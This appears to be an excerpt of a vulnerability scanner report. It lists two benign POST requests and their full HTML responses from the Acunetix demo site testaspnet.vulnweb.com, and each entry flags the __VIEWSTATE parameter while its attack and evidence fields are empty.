Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1107 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,107 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8460&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAmebnGdsIZGRk478HAAIgkI0zMsuIEhe5pH36GUQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLaveCpCALRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJXv1ksI6eFxmolY93ZAQLs6ue6eg%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:16 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAmebnGdsIZGRk478HAAIgkI0zMsuIEhe5pH36GUQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLaveCpCALRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJXv1ksI6eFxmolY93ZAQLs6ue6eg=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:White" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1107 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,107 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8476&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBANY16JtsIZGRkQPrqNHDU7SLUYyjMjNn4CNgxikQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLvquPoDALRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJNbxhfsHk9G36l2Al0lZ4GNajcUU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:36 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBANY16JtsIZGRkQPrqNHDU7SLUYyjMjNn4CNgxikQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLvquPoDALRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJNbxhfsHk9G36l2Al0lZ4GNajcUU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:White" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
